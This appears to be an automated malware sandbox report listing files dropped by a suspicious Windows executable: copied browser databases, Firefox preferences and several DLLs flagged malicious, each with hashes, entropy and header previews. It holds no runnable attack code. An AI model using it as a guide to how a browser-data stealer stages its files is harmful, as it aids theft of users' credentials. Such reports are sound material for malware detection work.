                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1734747327);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):126976
                                                                                                                                                                                                                              Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):294912
                                                                                                                                                                                                                              Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                              MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                              SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                              SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                              SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):685392
                                                                                                                                                                                                                              Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):608080
                                                                                                                                                                                                                              Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):450024
                                                                                                                                                                                                                              Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2046288
                                                                                                                                                                                                                              Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257872
                                                                                                                                                                                                                              Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):80880
                                                                                                                                                                                                                              Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4017
                                                                                                                                                                                                                              Entropy (8bit):5.365271649872934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:iqbYqGSI6ou/fmOYqSqtzHeqKksvoqdqZ4UqqI9FRWTxvqh:iqbYqGcn/uHqXtzHeqKksvoqdqZrqqSd
                                                                                                                                                                                                                              MD5:E8835F191292F770FBB89F7D59E5F3C5
                                                                                                                                                                                                                              SHA1:322904095315FC60F6A32C2B0D2BB8CA7F00C134
                                                                                                                                                                                                                              SHA-256:427FE9AF874FFC7936AEB39E9FED3C07BA98F61F534FE8594159F111416EDD82
                                                                                                                                                                                                                              SHA-512:D62C675812AE180DE51B031496EDE6D032BFDC0441071951AADBCE493A206E4C7675CE51C0193DBB705CE0E98D247EDBCA6B23FF79AC9AB23F0D04E7EEADB6B2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):1058
                                                                                                                                                                                                                              Entropy (8bit):5.356262093008712
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                                                                                                                              MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                                                                                                                              SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                                                                                                                              SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                                                                                                                              SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:V:V
                                                                                                                                                                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:0
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):242176
                                                                                                                                                                                                                              Entropy (8bit):6.47050397947197
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                                                                                                                                                                                              MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                                                                                                                                                                                              SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                                                                                                                                                                                              SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                                                                                                                                                                                              SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):685392
                                                                                                                                                                                                                              Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21
                                                                                                                                                                                                                              Entropy (8bit):3.880179922675737
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:gFsR0GOWW:gyRhI
                                                                                                                                                                                                                              MD5:408E94319D97609B8E768415873D5A14
                                                                                                                                                                                                                              SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                                                                                                                                                                                              SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                                                                                                                                                                                              SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:9tKiK3bsYm4fMuK47Pk3s
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):608080
                                                                                                                                                                                                                              Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
